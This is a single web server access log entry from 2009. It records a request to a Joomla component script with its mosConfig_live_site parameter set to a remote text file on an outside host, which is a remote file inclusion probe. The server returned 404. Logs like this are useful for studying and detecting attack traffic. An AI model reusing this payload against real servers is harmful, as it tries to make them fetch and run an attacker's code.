211.189.40.249 - - [15/Jun/2009:04:32:51 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
